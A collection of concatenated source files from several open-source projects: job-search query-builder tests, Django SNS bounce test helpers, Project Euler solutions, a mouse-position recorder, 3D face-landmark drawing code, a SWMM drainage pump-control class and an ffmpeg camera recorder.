"workplace_address.municipality_concept_id": {"value": "2222"}}}
]),
({settings.APIKEY: "",
taxonomy.REGION: ["01", "-02"],
taxonomy.MUNICIPALITY: ["1111"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "1111", "boost": 2.0}}},
],
[
{"term": {"workplace_address.region_code": {"value": "02"}}},
{"term": {"workplace_address.region_concept_id": {"value": "02"}}}
]),
({settings.APIKEY: "",
taxonomy.REGION: ["01"],
taxonomy.MUNICIPALITY: ["1111", "-2222"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "1111", "boost": 2.0}}},
],
[
{"term": {"workplace_address.municipality_code": {"value": "2222"}}},
{"term": {"workplace_address.municipality_concept_id": {"value": "2222"}}}
])])
def test_region_municipality_query(args, expected_pos, expected_neg, mock_query_builder):
query_dsl = mock_query_builder.parse_args(args)
if expected_pos:
pos_query = query_dsl["query"]["bool"]["must"][0]["bool"]["should"]
assert (len(pos_query) == len(expected_pos))
for e in expected_pos:
assert (e in pos_query)
if expected_neg:
neg_query = query_dsl["query"]["bool"]['must'][0]["bool"]["must_not"]
assert (len(neg_query) == len(expected_neg))
for e in expected_neg:
assert (e in neg_query)
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
def test_rewrite_querystring(mock_query_builder):
# concepts blob should be handled differently
concepts = {'skill': [
{'term': 'c++', 'uuid': '1eb1dbeb-e22a-53cb-bb28-c9fbca5ad307',
'concept': 'C++', 'type': 'KOMPETENS',
'term_uuid': '9734cba6-eff8-5cdc-9881-392a4345e57e',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'c#', 'uuid': 'af98ee4d-49e7-5274-bc76-a9f119c1514c',
'concept': 'C-sharp', 'type': 'KOMPETENS',
'term_uuid': '37da571a-a958-5b3d-a857-0a0a6bbc88cf',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'asp.net', 'uuid': '18d88a83-55d5-527b-a800-3695ed035a0c',
'concept': 'Asp.net', 'type': 'KOMPETENS',
'term_uuid': '280d3fa7-becd-510d-94ac-c67edb0ef4e0',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'c++', 'uuid': '1eb1dbeb-e22a-53cb-bb28-c9fbca5ad307',
'concept': 'C++', 'type': 'KOMPETENS',
'term_uuid': '9734cba6-eff8-5cdc-9881-392a4345e57e',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'tcp/ip', 'uuid': '09df5ef2-357f-5cfc-9333-dec2e220638a',
'concept': 'Tcp/ip', 'type': 'KOMPETENS',
'term_uuid': 'a18b2945-779f-5032-bbaa-c7945a63055f',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''}], 'occupation': [
{'term': 'specialpedagog',
'uuid': '4872acf8-ea61-50fe-8a7e-7af82b37ce9e',
'concept': 'Specialpedagog',
'type': 'YRKE', 'term_uuid': 'c6db8f6e-69f7-5aae-af18-2a1eae084eba',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'lärare', 'uuid': 'eadc9f5f-35c0-5324-b215-ea388ca054ff',
'concept': 'Lärare', 'type': 'YRKE',
'term_uuid': '300844f7-77b6-539e-a8d7-1955ce18a00c',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''},
{'term': 'speciallärare',
'uuid': '2708c006-d8d0-5920-b434-a5968aa088e3',
'concept': 'Speciallärare',
'type': 'YRKE', 'term_uuid': 'cd50806f-3c52-5e73-a06e-c7a65f7410a4',
'term_misspelled': False,
'version': 'NARVALONTOLOGI-2.0.0.33', 'operator': ''}], 'trait': [],
'location': [], 'skill_must': [],
'occupation_must': [], 'trait_must': [], 'location_must': [],
'skill_must_not': [],
'occupation_must_not': [], 'trait_must_not': [],
'location_must_not': []}
assert mock_query_builder._rewrite_querystring("specialpedagog lärare speciallärare", concepts) == ""
assert mock_query_builder._rewrite_querystring("specialpedagog speciallärare lärare", concepts) == ""
assert mock_query_builder._rewrite_querystring("lärare speciallärare flärgare", concepts) == "flärgare"
assert mock_query_builder._rewrite_querystring("korvprånglare c++ asp.net [python3] flärgare",
concepts) == "korvprånglare [python3] flärgare"
assert mock_query_builder._rewrite_querystring("tcp/ip", concepts) == ""
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("querystring, expected_phrase, expected_returned_query, test_id", [
# With these quotes, the query will be returned with some quote modification
# the 'matches' field will be empty
("'gymnasielärare'", [], 'gymnasielärare', 'a'),
("""gymnasielärare""", [], 'gymnasielärare', 'b'),
('''gymnasielärare''', [], 'gymnasielärare', 'c'),
("gymnasielärare\"", [], 'gymnasielärare', 'd'), #
("gymnasielärare\"", [], 'gymnasielärare', 'd2'), #
("gymnasielärare\'", [], 'gymnasielärare', 'e'),
("\'gymnasielärare", [], 'gymnasielärare', 'f'),
(r"""gymnasielärare""", [], 'gymnasielärare', 'g'),
(r'''gymnasielärare''', [], 'gymnasielärare', 'h'),
("gymnasielärare lärare", [], 'gymnasielärare lärare', 'i'),
("""'gymnasielärare'""", [], 'gymnasielärare', 'j'),
('''"gymnasielärare" "lärare"''', ['gymnasielärare', 'lärare'], '', 'aa'),
('''"gymnasielärare lärare"''', ['gymnasielärare lärare'], '', 'ab'),
('"gymnasielärare"', ['gymnasielärare'], '', 'ac'),
("\"gymnasielärare\"", ['gymnasielärare'], '', 'ad'),
("\"gymnasielärare", ['gymnasielärare'], '', 'ae'),
("\"gymnasielärare", ['gymnasielärare'], '', 'af'),
('''"gymnasielärare"''', ['gymnasielärare'], '', 'ag'),
# "normal" quotes, 'phrases' field empty, query returned
("gymnasielärare", [], 'gymnasielärare', 'x'),
('gymnasielärare', [], 'gymnasielärare', 'y'),
('python', [], 'python', 'z'),
])
def test_extract_querystring_different_quotes(querystring, expected_phrase, expected_returned_query, test_id,
mock_query_builder):
"""
Test behavior of querybuilder.extract_quoted_phrases
when sending strings with different types of quotes
"""
actual_result = mock_query_builder.extract_quoted_phrases(querystring)
# no plus or minus used in this test, so these fields must be empty
assert actual_result[0]['phrases_must'] == [], f"'phrases_must' was {actual_result[0]['phrases_must']}"
assert actual_result[0]['phrases_must_not'] == [], f"'phrases_must_not' was {actual_result[0]['phrases_must_not']}"
actual_phrases = actual_result[0]['phrases']
assert actual_phrases == expected_phrase, f"got {actual_phrases} but expected {expected_phrase}"
actual_returned_query = actual_result[1]
assert actual_returned_query == expected_returned_query, f"got {actual_returned_query} but expected {expected_returned_query}"
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("querystring, expected", [
("-php", {"bool": {"must_not": {"term": {"keywords.enriched.skill.raw": {"value": "php"}}}}}),
("+java", {"bool": {"must": {"term": {"keywords.enriched.skill.raw": {"value": "java"}}}}}),
("python",
{"bool": {"must": {
"bool": {"should": {"term": {"keywords.enriched.skill.raw": {"value": "python"}}}}}}}),
("systemutvecklare python +java",
{"bool": {
"must": {"bool": {"should": {"term": {"keywords.enriched.skill.raw": {"value": "python"}}}}}}}),
("systemutvecklare python +java",
{"bool": {"must": {"term": {"keywords.enriched.skill.raw": {"value": "java"}}}}}),
("systemutvecklare python +java", {"bool": {
"must": {"bool": {
"should": {"term": {"keywords.enriched.occupation.raw": {"value": "systemutvecklare"}}}}}}}),
("systemutvecklare python +java", {"bool": {
"must": {"bool": {
"should": {"term": {"keywords.extracted.occupation.raw": {"value": "systemutvecklare"}}}}}}}),
("systemutvecklare python +java -php",
{"bool": {
"must": {"bool": {"should": {"term": {"keywords.enriched.skill.raw": {"value": "python"}}}}}}}),
("systemutvecklare python +java -php",
{"bool": {"must": {"term": {"keywords.enriched.skill.raw": {"value": "java"}}}}}),
("systemutvecklare python +java -php", {"bool": {
"must": {"bool": {
"should": {"term": {"keywords.enriched.occupation.raw": {"value": "systemutvecklare"}}}}}}}),
("systemutvecklare python +java -php",
{"bool": {"must_not": {"term": {"keywords.enriched.skill.raw": {"value": "php"}}}}}),
])
def test_freetext_bool_structure(querystring, expected, mock_query_builder):
result = mock_query_builder._build_freetext_query(querystring, queryfields=None, freetext_bool_method="and",
disable_smart_freetext=False)
assert _assert_json_structure(result, expected)
```
#### File: unit_tests/test_resources/qb_helper.py
```python
import datetime
import pytz
def utc_offset():
offset = datetime.datetime.now(pytz.timezone('Europe/Stockholm')).utcoffset()
return int(offset.seconds / 3600)
def _assert_json_structure(result, expected):
return _walk_dictionary(result, expected)
def _walk_dictionary(result, expected):
if isinstance(result, str) and isinstance(expected, str):
return result == expected
else:
for item in expected:
if item in result:
if isinstance(result[item], list):
for listitem in result[item]:
if _walk_dictionary(listitem, expected[item]):
return True
else:
return _walk_dictionary(result[item], expected[item])
return False
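# --- Added usage sketch (assumption: not part of the original helper module) ---
# _assert_json_structure() reports whether `expected` occurs as a nested
# substructure of `result`; a list in `result` matches if any of its elements does.
if __name__ == "__main__":
    built = {"bool": {"must": [{"term": {"skill": "python"}},
                               {"term": {"skill": "java"}}]}}
    assert _assert_json_structure(built, {"bool": {"must": {"term": {"skill": "java"}}}})
    assert not _assert_json_structure(built, {"bool": {"must": {"term": {"skill": "php"}}}})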
``` |
{
"source": "jobtender24/django-bouncy",
"score": 2
} |
#### File: django_bouncy/tests/helpers.py
```python
import os
import json
from django.test import TestCase
from django.test.utils import override_settings
from django.conf import settings
DIRNAME, _ = os.path.split(os.path.abspath(__file__))
@override_settings(BOUNCY_VERIFY_CERTIFICATE=False)
class BouncyTestCase(TestCase):
"""Custom TestCase for django-bouncy"""
@classmethod
def setUpClass(cls):
"""Setup the BouncyTestCase Class"""
super(BouncyTestCase, cls).setUpClass()
cls.old_setting = getattr(settings, 'BOUNCY_TOPIC_ARN', None)
cls.notification = loader('bounce_notification')
cls.complaint = loader('complaint')
cls.bounce = loader('bounce')
cls.keyfileobj = open(DIRNAME + ('/examples/SimpleNotificationService'
'-e372f8ca30337fdb084e8ac449342c77.'
'pem'))
cls.pemfile = cls.keyfileobj.read()
settings.BOUNCY_TOPIC_ARN = [
'arn:aws:sns:us-east-1:250214102493:Demo_App_Unsubscribes'
]
@classmethod
def tearDownClass(cls):
"""Tear down the BouncyTestCase Class"""
if cls.old_setting is not None:
settings.BOUNCY_TOPIC_ARN = cls.old_setting
def loader(example_name):
"""Load examples from their JSON file and return a dictionary"""
filename_format = '{dir}/examples/example_{name}.json'
file_obj = open(filename_format.format(dir=DIRNAME, name=example_name))
return json.load(file_obj)
``` |
{
"source": "jobu95/euler",
"score": 4
} |
#### File: euler/src/pr004.py
```python
def palindromes():
    """Find the largest palindrome that is a product of two 3-digit numbers."""
max_pal = 0
i = 101
while i <= 999:
j = 101
while j <= 999:
product = i*j
pstr = str(product)
if pstr == pstr[::-1] and product > max_pal: # reverse string
max_pal = product
            j = j + 2  # step by 2: only odd candidate factors are tried
        i = i + 2
return max_pal
if __name__ == "__main__":
print(palindromes())
```
#### File: euler/src/pr006.py
```python
# compute the sum of the squares of the first n natural numbers
def sqsum(n):
if n < 1:
return 0
def iter(cur, acc):
if cur == 0:
return acc
else:
return iter(cur - 1, acc + cur**2)
return iter(n, 0)
# compute the square of the sum of the first n natural numbers
def sumsq(n):
if n < 1:
return 0
def iter(cur, acc):
if cur == 0:
return acc
else:
return iter(cur - 1, acc + cur)
return iter(n, 0)**2
if __name__ == "__main__":
print(sumsq(100) - sqsum(100))
``` |
{
"source": "jobu95/mousetrap",
"score": 3
} |
#### File: jobu95/mousetrap/record.py
```python
import os
import pyautogui as gui
import threading
import time
import frames_pb2
import pb_io
class ThreadArgs:
def __init__(self):
pass
run = True
lock = threading.Lock()
# list of positions.
# each position is represented as ((x, y), time).
# protected by lock.
mouse_positions = []
# list of dropped frames.
# each is a simple monotonic timestamp.
# used for debugging.
# protected by lock.
dropped_frames = []
def watch(args):
# core framerate management
goal_framerate = 60 # in frames per second
goal_loop_time_s = 1.0 / goal_framerate
start_s = time.monotonic()
next_s = start_s + goal_loop_time_s
# logging
log_cadence_s = 5.0 # log every n seconds
log_s = start_s + log_cadence_s
# framerate monitoring
i = 0
prev = time.monotonic()
print("goal loop time: {}".format(goal_loop_time_s))
while args.run:
# sleep until next frame window
now_s = time.monotonic()
while now_s < next_s:
time.sleep(0.01)
now_s = time.monotonic()
now_s = time.monotonic()
next_s += goal_loop_time_s
# if next frame is behind present, then drop frames till we hit
# present. This avoids pinning the CPU if we hit a lag spike.
while next_s < now_s:
args.lock.acquire()
args.dropped_frames.append(next_s)
args.lock.release()
next_s += goal_loop_time_s
# record mouse position
args.lock.acquire()
args.mouse_positions.append((gui.position(), now_s))
args.lock.release()
# log every (goal framerate) frames
i += 1
if i % goal_framerate == 0:
print("{} frames in {} seconds".format(goal_framerate, now_s - prev))
prev = now_s
# log every log_s seconds
if now_s > log_s:
print("watch_thread stats")
args.lock.acquire()
print(" mouse positions seen: {}".format(len(args.mouse_positions)))
print(" dropped frames: {}".format(len(args.dropped_frames)))
args.lock.release()
log_s += log_cadence_s
def watch_thread(args):
print("watch_thread started")
watch(args)
print("watch_thread stopped")
def log(args):
goal_loop_time_s = 30.0
next_s = time.monotonic() + goal_loop_time_s
if not os.path.isdir("data"):
os.mkdir("data")
mouse_pos_dir = "data/mouse_pos"
if not os.path.isdir(mouse_pos_dir):
os.mkdir(mouse_pos_dir)
dropped_frames_dir = "data/dropped_frames"
if not os.path.isdir(dropped_frames_dir):
os.mkdir(dropped_frames_dir)
while args.run:
# sleep until next frame window
now_s = time.monotonic()
while args.run and now_s < next_s:
now_s = time.monotonic()
time.sleep(1)
next_s += goal_loop_time_s
# grab data and release locks
print("log_thread grabbing data...")
mouse_positions = []
dropped_frames = []
args.lock.acquire()
mouse_positions = args.mouse_positions
args.mouse_positions = []
dropped_frames = args.dropped_frames
args.dropped_frames = []
args.lock.release()
print("log_thread grabbed data")
# migrate data to proto
pb_mouse_positions = frames_pb2.MousePositions()
for mouse_pos in mouse_positions:
pb_mouse_pos = pb_mouse_positions.positions.add()
pb_mouse_pos.time = mouse_pos[1]
pb_mouse_pos.x = mouse_pos[0][0]
pb_mouse_pos.y = mouse_pos[0][1]
pb_dropped_frames = []
for dropped_frame in dropped_frames:
pb_dropped_frame = frames_pb2.DroppedFrame()
pb_dropped_frame.time = dropped_frame
pb_dropped_frames.append(pb_dropped_frame)
# save mouse positions to disk
now = time.time()
filename = "{}/{}.pb".format(mouse_pos_dir,now)
print("save {} mouse pos to {}".format(len(pb_mouse_positions.positions), filename))
pb_io.save_pb2(pb_mouse_positions, filename)
# TODO save dropped frames
def log_thread(args):
print("log_thread started")
log(args)
print("log_thread stopped")
def record():
thread_args = ThreadArgs()
watch_thd = threading.Thread(target=watch_thread, args=(thread_args,))
log_thd = threading.Thread(target=log_thread, args=(thread_args,))
print("Main thread starting watch_thread")
watch_thd.start()
print("Main thread starting log_thread")
log_thd.start()
print("Press enter to exit the application")
input()
thread_args.run = False
print("Main thread joining watch_thread")
watch_thd.join()
print("Main thread joining log_thread")
log_thd.join()
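# --- Added entry-point sketch (assumption: not part of the original module) ---
# record() starts the watcher and logger threads and blocks until the user
# presses enter, so a plain entry point is all that is needed to run this file.
if __name__ == "__main__":
    record()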
``` |
{
"source": "jobutsu/MeFaMo",
"score": 3
} |
#### File: mefamo/utils/drawing.py
```python
from mediapipe.python.solutions import face_mesh, drawing_utils, drawing_styles
import open3d as o3d
import open3d.visualization.rendering as rendering
import cv2
class Drawing():
    @staticmethod
    def draw_landmark_point(landmark, image, color=(255, 0, 0), radius=5):
try:
image_rows, image_cols, _ = image.shape
keypoint_px = drawing_utils._normalized_to_pixel_coordinates(landmark.x, landmark.y,
image_cols, image_rows)
center_coordinates = (int(keypoint_px[0]), int(keypoint_px[1]))
return cv2.circle(image, center_coordinates, radius, color, 2)
except Exception as e:
print(e)
return image
    @staticmethod
    def draw_3d_face(landmarks, image):
# create pointcloid with open3d
        frame_height, frame_width, channels = image.shape  # numpy shape is (rows, cols, channels)
try:
render = rendering.OffscreenRenderer(frame_width, frame_height)
vector = o3d.utility.Vector3dVector(landmarks[0:3].T)
pcd = o3d.geometry.PointCloud(vector)
#o3d.visualization.draw_geometries([pcd])
yellow = rendering.MaterialRecord()
yellow.base_color = [1.0, 0.75, 0.0, 1.0]
yellow.shader = "defaultLit"
render.scene.add_geometry("pcd", pcd, yellow)
# Optionally set the camera field of view (to zoom in a bit)
vertical_field_of_view = 15.0 # between 5 and 90 degrees
aspect_ratio = frame_width / frame_height # azimuth over elevation
near_plane = 0.1
far_plane = 150
fov_type = o3d.visualization.rendering.Camera.FovType.Vertical
render.scene.camera.set_projection(vertical_field_of_view, aspect_ratio, near_plane, far_plane, fov_type)
# Look at the origin from the front (along the -Z direction, into the screen), with Y as Up.
center = [0, 0, 0] # look_at target
eye = [0, 0, 80] # camera position
up = [0, 1, 0] # camera orientation
render.scene.camera.look_at(center, eye, up)
render.scene.set_background([0, 0, 0, 0])
img = render.render_to_image()
return img
except Exception as e:
print(e)
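# --- Added usage sketch (assumption: not part of the original module; 'face.jpg'
# is a hypothetical input image). Runs MediaPipe FaceMesh on a still image and
# draws every detected landmark with Drawing.draw_landmark_point().
if __name__ == "__main__":
    img = cv2.imread('face.jpg')
    with face_mesh.FaceMesh(static_image_mode=True) as mesh:
        results = mesh.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    if results.multi_face_landmarks:
        for lm in results.multi_face_landmarks[0].landmark:
            img = Drawing.draw_landmark_point(lm, img, radius=1)
        cv2.imwrite('face_landmarks.jpg', img)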
``` |
{
"source": "jobvanderwerf/TUDelft_ENVM1601",
"score": 3
} |
#### File: TUDelft_ENVM1601/Operation_and_Control/ENVM1601_Heuristics.py
```python
import pyswmm
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib as mpl
class HeuristicRTC():
"""
Heuristic RTC is a python class used in the course
ENVM1601 for the MSc Environmental Engineering at the Delft
University of Technology. This code is meant to aid students in their
initial experience with Real Time Control of Urban Drainage Systems.
This code relies heavily on the EPA SWMM5 Python wrapper "pyswmm",
developed and maintained by <NAME>:
https://doi.org/10.21105/joss.02292
"""
def __init__(self,
model_directory=None,
model_name=None,
):
"""
The initialisation of the model run. Most of the code below is to
ensure that there is a correct link to a SWMM model.
Parameters
----------
model_directory : TYPE, str
Takes the directory of the SWMM model to be used.
The default is None.
model_name : TYPE, str
Takes the name of the inputfile (including the '.inp' extension).
The default is None.
Returns
-------
None.
"""
if model_name == None:
if model_directory == None:
mn = [i for i in os.listdir() if '.inp' in i]
assert len(mn) == 1, ('Zero or Multiple input files found ' +
'in target directory, specify the ' +
'desired inp file')
self.model_path = mn[0]
else:
mn = [i for i in os.listdir(model_directory) if 'inp' in i]
assert len(mn) == 1, ('Zero or Multiple input files found ' +
'in given target directory,' +
' specify the desired inp file')
self.model_path = model_directory + '\\' + mn[0]
else:
if model_directory == None:
assert os.path.isfile(model_name), ('The given "model_name"' +
'is not found, ' +
'ensure the name contains'+
' .inp and exists in ' +
os.getcwd())
self.model_path = model_name
else:
assert os.path.isfile(model_directory +
'\\' +
model_name), ('The given "model_name"' +
'is not found, ' +
'ensure the name contains'+
' .inp and exists in ' +
model_directory)
self.model_path = model_directory + '\\' + model_name
def run_model(self, rule_dictionary):
"""
Parameters
----------
rule_dictionary : DICT
"rule dictionary" contains the rules which are used for
controlling the catchment. The translation form takes a list
of rules per actuator. These lists contain lists of the rules in
the form of :
1. The node that the rule is based on
2. The level that node needs to above or below to change the
rule
3. The set point for the relevant pump where:
0 = OFF
1 = ON (Full capacity as per the pump curve)
any value between 0-1 for the percentage utilised
4. "higher" or "lower", to determine if the rule is about being
higher or lower than the given treshold
example:
rule_dictionary = {'p10_1': [['j_10', 0.2, 1, 'higher'],
['j_10', 0.2, 0, 'lower']],
'p_2_1':[['j_2', 0.5, 1, 'higher'],
['j_2', 0.2, 0, 'lower'],
['j_2', 1.5, 0.5, 'higher']],
'p_20_2': [['j_20', 0.3, 1, 'higher'],
['j_20', 0.2, 0, 'lower']],
'p_21_2': [['j_21', 0.3, 1, 'higher'],
['j_21', 0.2, 0, 'lower']],
'CSO_Pump_2': [['j_2', 2.6, 1, 'higher'],
['j_2', 2.3, 0, 'lower']],
'CSO_Pump_21': [['j_21', 1, 1, 'higher'],
['j_21', 0.8, 0, 'lower']],
'WWTP_inlet': [['j_10', 0.3, 1, 'higher'],
['j_10', 0.1, 0, 'lower']]}
Returns
-------
DataFrame
A pandas dataframe with the outfall recorded for each of
the outfalls in the model.
"""
assert isinstance(rule_dictionary, dict), ('Ensure that the rules ' +
'specified are in a ' +
'dictionary format')
assert isinstance(list(rule_dictionary.values())[0],
list), ('The dictionary entries should be a -list-' +
' of conditions, not a ' + '%s' %
type(list(rule_dictionary.values())[0]))
with pyswmm.Simulation(self.model_path) as sim:
links_model = pyswmm.Links(sim) #initialise the link connections
nodes_model = pyswmm.Nodes(sim) #initlialise the node connections
system_routing = pyswmm.SystemStats(sim) #enable getting the stats
sim.step_advance(900) #the system can only change every 15min
self.list_of_pumps = [i.linkid for i in
links_model if i.is_pump()] #makes a list of
#all the pumps available in the system that should be controlled
self.list_of_outfalls = [i.nodeid for i in nodes_model
if i.is_outfall()]
#lists all the outfall in the system
self.outfall_results = [[] for i in self.list_of_outfalls]
#initialises a list of lists where the results can be stored during
#the run
self.times = [] #idem as above but for the time
for step in sim:
for pump in self.list_of_pumps:
try: #the try construction is to catch if the pump is not
#specified, to give a more accurate error
for rule in rule_dictionary[pump]:
## IMPLEMENTATION OF THE RULES ##
if 'higher' in [d.lower() for d in
rule if isinstance(d, str)]:
#means the rules is activated if > threshold
if nodes_model[rule[0]].depth > rule[1]:
links_model[pump].target_setting = rule[2]
elif 'lower' in [d.lower() for d in
rule if isinstance(d, str)]:
if nodes_model[rule[0]].depth <= rule[1]:
links_model[pump].target_setting = rule[2]
                    except KeyError:
                        # a pump without an entry in the rule dictionary is a
                        # configuration error, so raise it as such
                        raise AttributeError('Pump ' + pump +
                                             ' Not Specified in Rules,' +
                                             ' please add')
## GETTING THE INFLOW TO THE OUTFALLS AT EACH TIMESTEP ##
for i, outfall in enumerate(self.list_of_outfalls):
self.outfall_results[i].\
append(nodes_model[outfall].total_inflow)
self.times.append(sim.current_time)
print("Final Routing Error:", "%s" %
"{:0.2f}".format(float(system_routing.\
routing_stats['routing_error'])/100)+
"%\n" + "Flooding Volume:",
"%s" %
system_routing.routing_stats['flooding'])
            ## TRANSLATING THE OUTFALL DATA TO A DATAFRAME ##
self.outfall_output = pd.DataFrame(self.outfall_results)
self.outfall_output = self.outfall_output.transpose()
self.outfall_output.columns=self.list_of_outfalls
return self.outfall_output
def interpret_results(self, plotting=False):
"""
Parameters
----------
plotting : TYPE, optional
DESCRIPTION. The default is False.
Set to TRUE if you want the function to output a plotted overview
of the outfalls
Returns
-------
Series
Total loading per outfall as recorded in the model run.
This might deviate from the .rpt loading summary. This is because
the rpt is the sum from every computed timestep
rather than recorded and therefore the interpolation used
might affect the load.
Consider the rpt file as more accurate
"""
mft = mdates.DateFormatter("%Y-%m-%d\n%H:%M")
if plotting == False:
return self.outfall_output.sum()
else:
max_inflow = np.max(self.outfall_results)
## DOWN HERE MAKES THE PLOT ##
fig, ax = plt.subplots(4, 2, figsize=(10, 5))
mpl.rcParams['figure.titlesize'] = 18
for i, c in enumerate(self.outfall_output.columns):
if i > 3:
loc = (i-4, 1)
else:
loc = (i, 0)
ax[loc[0], loc[1]].plot(self.times, self.outfall_output[c])
if np.max(self.outfall_output[c]) == 0:
ax[loc[0], loc[1]].text(self.times[int(len(self.times)/2)],
max_inflow/2,
'No Outfall Recorded',
horizontalalignment='center',
verticalalignment='center')
if 'cso' in c:
ax[loc[0], loc[1]].set(title='Total Flow To: ' + c.upper(),
ylim=[0, max_inflow*1.1])
else:
ax[loc[0], loc[1]].set(title='Total Flow To: ' + c,
ylim=[0, max_inflow*1.1])
if loc[0] == 3 or loc[0] == 7:
ax[loc[0], loc[1]].set(xticks=[self.times[int(i)] for i in
[0,
np.floor(len(self.times)/4),
np.floor(len(self.times)/2),
np.floor(3*len(self.times)
/4),
len(self.times)-1]])
ax[loc[0], loc[1]].xaxis.set_major_formatter(mft)
else:
ax[loc[0], loc[1]].set(xticks=[])
fig.suptitle('Overview of Total Inflow all Outfalls')
fig.add_subplot(111, frameon=False)
plt.tick_params(labelcolor='none', which='both', top=False,
bottom=False,left=False,right=False)
plt.ylabel('Inflow Per Outfall ($m^3/s$)')
fig.tight_layout()
return self.outfall_output.sum()
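# --- Added usage sketch (assumption: not part of the original module; it expects
# a single SWMM .inp file in the working directory). The rule set below is the
# example documented in run_model()'s docstring.
if __name__ == "__main__":
    controller = HeuristicRTC()
    example_rules = {'p10_1': [['j_10', 0.2, 1, 'higher'],
                               ['j_10', 0.2, 0, 'lower']],
                     'p_2_1': [['j_2', 0.5, 1, 'higher'],
                               ['j_2', 0.2, 0, 'lower'],
                               ['j_2', 1.5, 0.5, 'higher']],
                     'p_20_2': [['j_20', 0.3, 1, 'higher'],
                                ['j_20', 0.2, 0, 'lower']],
                     'p_21_2': [['j_21', 0.3, 1, 'higher'],
                                ['j_21', 0.2, 0, 'lower']],
                     'CSO_Pump_2': [['j_2', 2.6, 1, 'higher'],
                                    ['j_2', 2.3, 0, 'lower']],
                     'CSO_Pump_21': [['j_21', 1, 1, 'higher'],
                                     ['j_21', 0.8, 0, 'lower']],
                     'WWTP_inlet': [['j_10', 0.3, 1, 'higher'],
                                    ['j_10', 0.1, 0, 'lower']]}
    controller.run_model(example_rules)
    print(controller.interpret_results(plotting=True))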
``` |
{
"source": "job-van-schipstal/video_store_service",
"score": 3
} |
#### File: video_store_service/video_store_service/record.py
```python
import subprocess, os, requests, logging
from threading import Thread
from time import sleep
from typing import List, Tuple, Dict, Any
from video_store_service import apiclient
# Recording may take at most 15 times the supposed recording duration
timeout_multiplier = 15
#Video folder
video_folder = 'videos'
#test_filename
test_filename = 'test.mp4'
def data_streamer_thread(ffmpeg: subprocess.Popen, request: requests.Response):
"""
While ffmpeg is running, reads data from Response class (the camera) and writes it to ffmpeg
:param ffmpeg: ffmpeg process
:param request: request class with video stream
:return: nothing
"""
for data in request.iter_content(chunk_size=None, decode_unicode=False):
        # if ffmpeg is done, we are too
        if (ffmpeg.poll() is not None):
            print(f'ffmpeg returned {ffmpeg.returncode}')
break
try:
ffmpeg.stdin.write(data)
# Either ffmpeg crashed, or it wants no more data, stop sending either way
except BrokenPipeError:
break
def get_ffmpeg_command(file_name: str,
video_config: Dict[str, Any]) -> List[str]:
"""
Generates list
used by Popen to start ffmpeg
:param file_name: name of the output file (with file extension)
:param video_config: Dict with video configuration options
:return: List with ffmpeg and its command line parameters
"""
# Main cmd
cmd = ['ffmpeg']
# Add input framerate if defined
if video_config.get('framerate', 'auto') != 'auto':
cmd.append('-r'); cmd.append(str(video_config.get('framerate', 30)))
# Add pipe input and recording duration
cmd.append('-i'); cmd.append('pipe:0')
cmd.append('-t'); cmd.append(str(video_config.get('duration', 10)))
# If not debug, decrease ffmpeg verbosity to warning and up
if not video_config.get('debug_info', False):
cmd.append('-hide_banner')
cmd.append('-loglevel'); cmd.append('warning')
# If recoding, add libx264 video codec with fast encoding present
if video_config.get('recode', True):
cmd.append('-c:v'); cmd.append('libx264')
cmd.append('-preset'); cmd.append('ultrafast')
# Add output filename
cmd.append('-an'); cmd.append(str(file_name))
logging.debug(cmd)
return cmd
def run_ffmpeg_and_record(cmd: List[str],
duration: int,
access: requests.Response) -> Tuple[bool, str]:
"""
Function that starts the recording
Creates an instance of ffmpeg with the cmd it has been given
Spawns a thread that will pipe the video stream to ffmpeg
monitors that ffmpeg closes before duration * timeout_multiplier
Kills it if it doesn't
:param cmd: list of ffmpeg and its command line parameters
:param duration: int duration of recording, to determine timeout
:param access: reponse object with active connection to IP camera
Will be used to pipe the video stream to ffmpeg
:return: Tuple[boolean success, string message]
"""
logging.debug('Start FFmpeg')
ffmpeg = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=None,
stderr=None,
cwd=os.path.join(os.getcwd(), video_folder))
logging.debug('Start streaming recieved data to ffmpeg')
stream_thread = Thread(name='data_stream_thread',
target=data_streamer_thread,
args=(ffmpeg, access))
stream_thread.start()
### Wrapup safety code ###
# Recording may take at most duration * timeout_multiplier seconds
for i in range(1, duration * timeout_multiplier):
# If ffmpeg is done, return
if ffmpeg.poll() is not None:
return True, f'FFMPEG finished successfully in about {i} seconds'
# else wait
sleep(1)
    # Force terminate if not done (poll() returns None while ffmpeg is still running)
    if ffmpeg.poll() is None:
        logging.warning('Force FFMPEG termination')
        ffmpeg.terminate()
        sleep(1)
        if ffmpeg.poll() is None:
            ffmpeg.kill()
        return False, 'FFMPEG required forceful termination'
logging.debug('Done!')
return True, f'FFMPEG stopped at the last minute'
class FFMPEGRecorder():
"""
Class for recording videostream with ffmpeg
"""
def __init__(self, config: Dict[str, Any], client: apiclient.Client):
"""
:param config: Dict with configuration options
:param client: Apiclient class instance to get the video stream from
"""
self.__config = config
self.__client = client
def record(self, file_name: str) -> Tuple[bool, str]:
"""
